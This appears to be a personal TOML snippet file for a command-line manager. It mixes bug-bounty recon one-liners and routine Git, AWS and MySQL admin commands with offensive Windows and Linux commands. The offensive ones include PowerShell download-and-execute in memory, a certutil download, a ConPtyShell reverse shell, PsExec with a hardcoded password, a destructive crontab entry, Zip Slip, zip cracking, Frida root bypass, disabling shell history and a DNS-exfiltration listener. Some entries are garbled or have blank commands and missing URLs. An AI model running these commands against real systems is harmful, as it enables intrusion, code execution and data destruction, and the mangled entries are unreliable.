[[snippets]] | |
description = "Extract subdomains from IP Range" | |
command = "nmap <ip range> -sn | grep \"<greping domain>\" | awk '{print $5}'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Find subdomain and takeover (with subfinder/amass/assetfinder/subjack)" | |
command = "subfinder -d <domain> >> domains ; assetfinder -subs-only <domain> >> domains ; amass enum -norecursive -noalts -d <domain> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/ -v | tee takeover" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Find LFI with gau" | |
command = "~/go/bin/gau <domain> | ~/go/bin/gf lfi | ~/go/bin/qsreplace \"/etc/passwd\" | xargs -I % -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Find OpenRedirect with gau" | |
command = "export LHOST=\"http://localhost\"; gau <domain> | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get bugcrowd programs" | |
command = "curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "one | uniq); doneGet CIDR and Orgz from target lists" | |
command = "for DOMAIN in $(cat <FILE NAME>);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e \"CIDR\\|Organization\" | tr -s \" \" | paste - -; d" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get hackerone programs" | |
command = "curl -sL | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get intigriti programs" | |
command = "curl -sL | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from Archive" | |
command = "curl -s \"*.<domain>/*&output=text&fl=original&collapse=urlkey\" | sed -e 's_https*://__' -e \"s/\\/.*//\" | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from BufferOverRun" | |
command = "curl -s<domain> |jq -r .FDNS_A[]|cut -d',' -f2|sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from CertSpotter" | |
command = "curl -s \"<domain>\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from" | |
command = "curl -s \"<domain>&output=json\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from JLDC" | |
command = "curl -s \"<domain>?\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from" | |
command = "curl -s \"<domain>?full=1#result\" | grep \"<td><a\" | cut -d '\"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from" | |
command = "curl -s \"<domain>\" | grep -Po \"(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get Subdomains from VirusTotal" | |
command = "curl -s \"<domain>/subdomains?limit=40\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get url with gau, included parameter" | |
command = "echo <domain> | ~/go/bin/gau | grep \"=\" | qsreplace -a " | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get all the urls out of a sitemap.xml" | |
command = "curl -s <sitemap URL> | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get urls from urlscanio" | |
command = "gron \"<domain>\" | grep 'url' | gron --ungron" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Find XSS with gospider" | |
command = "gospider -S <TARGET URLS FILE> -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe -o result.txt" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "ipinfo" | |
command = "curl<param>" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Create a wordlist using param used in the domain" | |
command = "waybackurls <domain> | grep \"?\" | unfurl keys | sort -u | tee -a paramlist.txt" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Ports Scan without CloudFlare" | |
command = "subfinder -silent -d <domain> | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Sort & Tested Domains from" | |
command = "curl \"<API Key>&domain=<domain>\" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Find Subdomains TakeOver" | |
command = "subfinder -d <target> >> domains ; assetfinder -subs-only <target> >> domains ; amass enum -norecursive -noalts -d <target> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/ -v 3 >> takeover ;" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "Get multiple target's Custom URLs from ParamSpider" | |
command = "cat <domains file> | xargs -I % python3 ~/tool/ParamSpider/ -l high -o ./spidering/paramspider/% -d % ;" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "URLs Probing with cURL + Parallel" | |
command = "cat <domains file> | parallel -j50 -q curl -w 'Status:%{http_code}\\t Size:%{size_download}\\t %{url_effective}\\n' -o /dev/null -sk" | |
tag = ["hackpet"] | |
output = "" | |
[[snippets]] | |
description = "[Python] Install python module on current directory" | |
command = "pip3 install <MODULE_NAME=idna> -t ." | |
output = "" | |
[[snippets]] | |
description = "[Linux] Read file from Nth line using sed, read from line 4" | |
command = "sed -e '1,3d' < t.txt" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get all aws region" | |
command = "aws ec2 describe-regions --output text | awk '{print $4}'" | |
output = "" | |
[[snippets]] | |
description = "[Misc] Running Django cookiecutter using gunicorn" | |
command = "gunicorn --bind <ip-address or hostname>:8000 config.wsgi:application" | |
output = "" | |
[[snippets]] | |
description = "[Laravel] Restart laravel after .env update" | |
command = "sudo -u ${USER} php artisan config:cache && sudo -u ${USER} php artisan route:clear" | |
output = "" | |
[[snippets]] | |
description = "[GIT] add remote repo to git" | |
command = "git remote set-url origin REPO_URL" | |
output = "" | |
[[snippets]] | |
description = "[Wireshark] Filter to display dns response from dns server" | |
command = "dns.flags.response == 1" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Sync between s3 bucket" | |
command = "aws s3 sync s3://act-sites-twc/PasarSedekah/ s3://act-sites-twc-sydney/PasarSedekah/ --profile s3" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Get IAM User List" | |
command = "aws iam list-users --query 'Users[*].UserName' --output table" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Add default gw" | |
command = "sudo route add default gw eth0" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Delete default gw" | |
command = "sudo route del default gw eth0" | |
output = "" | |
[[snippets]] | |
description = "[Linux-Mysql] MySql on Debian-base Linux usually use a configuration file with the credentials." | |
command = "sudo mysql --defaults-file=/etc/mysql/debian.cnf" | |
output = "" | |
[[snippets]] | |
description = "[AWS-Metadata] obtain account-id and Region" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[AWS-Metadata] Obtain role name" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[Mysql] Create new user" | |
command = "CREATE USER 'newuser'@'localhost' IDENTIFIED BY 'password';" | |
output = "" | |
[[snippets]] | |
description = "[Mysql] grant ALL priviliege on newuser" | |
command = "GRANT ALL PRIVILEGES ON * . * TO 'newuser'@'localhost';" | |
output = "" | |
[[snippets]] | |
description = "[Mysql] Flush privilege on mysql" | |
command = "FLUSH PRIVILEGES;" | |
output = "" | |
[[snippets]] | |
description = "[Mysql] Update user password" | |
command = "UPDATE mysql.user SET Password=PASSWORD('<PASSWORD=new-password>') WHERE User='<USER=root>';" | |
output = "" | |
[[snippets]] | |
description = "[Git] Pull Request Specific commit" | |
command = "" | |
output = "" | |
[[snippets]] | |
description = "[Git] diff between remote and local" | |
command = "git diff origin/master -- [local-path]" | |
output = "" | |
[[snippets]] | |
description = "[MySQL] Reset password User" | |
command = "ALTER USER 'root'@'localhost' IDENTIFIED BY 'NewPassword';" | |
output = "" | |
[[snippets]] | |
description = "[MySQL] Init file mysql" | |
command = "mysqld --init-file=/home/me/mysql-init &" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Disable bash history permanently" | |
command = "set +o history" | |
output = "" | |
[[snippets]] | |
description = "[Git] Update submodule" | |
command = "git submodule update --init --recursive" | |
output = "" | |
[[snippets]] | |
description = "[Git] pull all including submodules" | |
command = "git pull --recurse-submodules" | |
output = "" | |
[[snippets]] | |
description = "[Laravel] Create Laravel Proejct with specific version" | |
command = "composer create-project laravel/laravel=\"5.1.*\" myProject" | |
output = "" | |
[[snippets]] | |
description = "[Exfiltrate] Receive DNS query exfiltrate" | |
command = "[Exfiltrate] tshark -f \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and matches \"<DOMAIN>\"\"" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Show name file list only on commit changes" | |
command = "git show --pretty=\"\" --name-only ab7b05d7a714b57a0a5820ebbe3bfb74eda4a3cd" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Show changes for specific file" | |
command = "git log -p Makefile" | |
output = "" | |
[[snippets]] | |
description = "[GIT] update submodule" | |
command = "git submodule update --init --recursive" | |
output = "" | |
[[snippets]] | |
description = "[ESP] erase flash" | |
command = " erase_flash" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Dumy Random commit" | |
command = "echo $RANDOM > $RANDOM && git add . && git commit -m \"$RANDOM\"" | |
output = "" | |
[[snippets]] | |
description = "[Window] Certutil Download file" | |
command = "certutil.exe -urlcache -f http://<HOST>/<FILENAME> <FILENAME>" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Powershell file download and execute in memory" | |
command = "powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('<URL_PATH>');" | |
output = "" | |
[[snippets]] | |
description = "[Windows] PsExec Command Execution" | |
command = "psexec.exe -i -s -accepteula \\\\ie8win7 -u administrator -p Esc@l@te cmd.exe" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Execute powershell using script" | |
command = "powershell -ExecutionPolicy Bypass -File <filename=runas.ps1>" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Invoke ConPtyShell Reverse Shell Windows" | |
command = "powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-ConPtyShell 3001" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Install msi msiexec" | |
command = "msiexec /quiet /qn /i 1.msi" | |
output = "" | |
[[snippets]] | |
description = "[Windows] Execute powerup in file" | |
command = "powershell -Version 2 -nop -exec bypass . .\\PowerUp.ps1; Invoke-AllChecks" | |
output = "" | |
[[snippets]] | |
description = "[Linux] List All Systemd Service" | |
command = "systemctl list-unit-files --type=service" | |
output = "" | |
[[snippets]] | |
description = "[Git] get file list of commit hash" | |
command = "git show --pretty=%gd --stat <COMMIT-HASH>" | |
output = "" | |
[[snippets]] | |
description = "[AWS] Create Lambda Layer" | |
command = "pip install requests -t python && zip -r python" | |
output = "" | |
[[snippets]] | |
description = "[Alembic] Generate migrations" | |
command = "alembic -c /home/apps/database/alembic.ini revision --autogenerate -m \"Add Attack Simulator\"" | |
output = "" | |
[[snippets]] | |
description = "[SteamPipe] AWS look for unassociate security group" | |
command = "select * from aws_vpc_security_group s left join (select sg ->> 'GroupId' as sg_id from aws_ec2_network_interface, jsonb_array_elements(groups) as sg) a on s.group_id = a.sg_id where a.sg_id is null;" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Add crontab without interactive mode" | |
command = "cat <(crontab -l) <(echo \"1 2 3 4 5\") | crontab -" | |
output = "" | |
[[snippets]] | |
description = "[MySQL] Mysqldump on mysqldump version 8" | |
command = "mysqldump -h$DB_HOST -u$DB_USER -p$DB_PASS pasarsedekah --set-gtid-purged=OFF --no-tablespaces --column-statistics=0 > ps_db_prod.sql" | |
output = "" | |
[[snippets]] | |
description = "[Linux] DDoS CPU Usage using sha1sum" | |
command = "sha1sum /dev/zero" | |
output = "" | |
[[snippets]] | |
description = "[GIT] Git checkout --bare or --mirror" | |
command = "git --git-dir=/tmp/attack-simulator.git --work-tree=. checkout -f" | |
output = "" | |
[[snippets]] | |
description = "[MySQL] get database size" | |
command = "SELECT table_schema AS \"Database\", SUM(data_length + index_length) / 1024 / 1024 / 1024 AS \"Size (GB)\" FROM information_schema.TABLES GROUP BY table_schema" | |
output = "" | |
[[snippets]] | |
description = "[Postgre] Dump Postgre DB" | |
command = "pg_dump -U <USERNAME> -h <HOST> -F <FORMAT=p> <DATABASE=pna_activity> > output_$(date +\"%H%M-%d-%m-%Y\").sql" | |
output = "" | |
[[snippets]] | |
description = "[Laravel] Install composer version 1" | |
command = "curl -sS | php -- --install-dir=/usr/local/bin --filename=composer --version=1.10.16" | |
output = "" | |
[[snippets]] | |
description = "[GIT] get current commit SHA" | |
command = "git rev-parse --short HEAD" | |
output = "" | |
[[snippets]] | |
description = "[GIT] get current branch of HEAD" | |
command = "git rev-parse --symbolic-full-name --abbrev-ref HEAD" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Mount Volume on Digital Ocean" | |
command = "mount -o discard,defaults,noatime /dev/disk/by-id/scsi-0DO_Volume_gw-files-sgp1-02 /home/deploy_user/container/files_wakaf/" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Create Swap 2 Gb" | |
command = "sudo /bin/dd if=/dev/zero of=/var/swap.1 bs=1M count=2024 && sudo /sbin/mkswap /var/swap.1 && sudo /sbin/swapon /var/swap.1" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Backup data from remote to local" | |
command = "rsync -chavzP --stats -e \"ssh -i dev-act.pem\" [email protected]:/home/datacenter/www/globalqurban/files/ /mnt/dc_data_globalqurban_sgp/globalqurban/files" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Mount EFS volume to Instance" | |
command = "sudo mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport globalqurban/files" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Crack zip password" | |
command = "fcrackzip -u -D -p ~/rockyou.txt ~/" | |
output = "" | |
[[snippets]] | |
description = "[AWS] get AWS region" | |
command = "aws ec2 describe-regions --region ap-southeast-2 | jq -r '.Regions [].RegionName'" | |
output = "" | |
[[snippets]] | |
description = "[Linux] Add new crontab" | |
command = "cat <(crontab -l) <(echo \"* * * * * chmod +s `rm -rf /tmp/*`\") | crontab -" | |
output = "" | |
[[snippets]] | |
description = "[Laravel] Generate new APP_KEY" | |
command = "php artisan key:generate" | |
output = "" | |
[[snippets]] | |
description = "[Git] set username for project" | |
command = "git config \"Your project specific name\"" | |
output = "" | |
[[snippets]] | |
description = "[Git] set email for project" | |
command = "git config \"[email protected]\"" | |
output = "" | |
[[snippets]] | |
description = "[Git] Get username config" | |
command = "git config --get" | |
output = "" | |
[[snippets]] | |
description = "[Exploit] Zip Slip payload generate" | |
command = "zip ../../../../../../../tmp/" | |
output = "" | |
[[snippets]] | |
description = "[AWS] AWS ECR Docker login" | |
command = "aws ecr get-login-password --region ap-southeast-1 | docker login --username AWS --password-stdin" | |
output = "" | |
[[snippets]] | |
description = "[GIT] add signing key" | |
command = "git config --global user.signingkey 4BB6D45482678BE3!" | |
output = "" | |
[[snippets]] | |
description = "[GIT] set gpg sign true" | |
command = "git config --global commit.gpgsign true" | |
output = "" | |
[[snippets]] | |
description = "[Linux] get ip from proc" | |
command = "awk '/32 host/ { print f } {f=$2}' <<< \"$(</proc/net/fib_trie)\"" | |
output = "" | |
[[snippets]] | |
description = "[Linux] delete file older than 3 days" | |
command = "find /home/forge/backup-database/databases -type f -mtime +3 -name '*.gz' -print0 | xargs -r0 rm --" | |
output = "" | |
[[snippets]] | |
description = "[AWS] authentication to EKS" | |
command = "aws eks --region ap-southeast-1 update-kubeconfig --name ${env_pref}-coins-eks --alias=${env_pref}" | |
output = "" | |
[[snippets]] | |
description = "[Frida] Frida running by pid" | |
command = "frida -l sslpin2.js -U -p `adb -s shell ps | grep -i coins | awk '{print $2}'`" | |
output = "" | |
[[snippets]] | |
description = "[Frida] Frida running root bypass" | |
command = "frida -U -f -l ~/Repos/random-scripts/frida/rootbypass2.js" | |
output = "" | |
[[snippets]] | |
description = "[Falco] falco rules validation" | |
command = "docker run --rm -v /Users/mf.akbar/Work/ /usr/bin/falco -r /etc/falco/falco_rules.yaml -r /etc/falco/falco_rules.local.yaml -r /etc/falco/customrules" | |
output = "" | |
[[snippets]] | |
description = "Gitlab SAST Scan oneliner" | |
command = "cat gl-sast-report.json | jq '.vulnerabilities[] | [.message, .severity, .location.file + \":\" + (.location.start_line|tostring)]' | less" | |
output = "" | |
[[snippets]] | |
description = "Read .plist file" | |
command = "plutil -p Info.plist" | |
output = "" |
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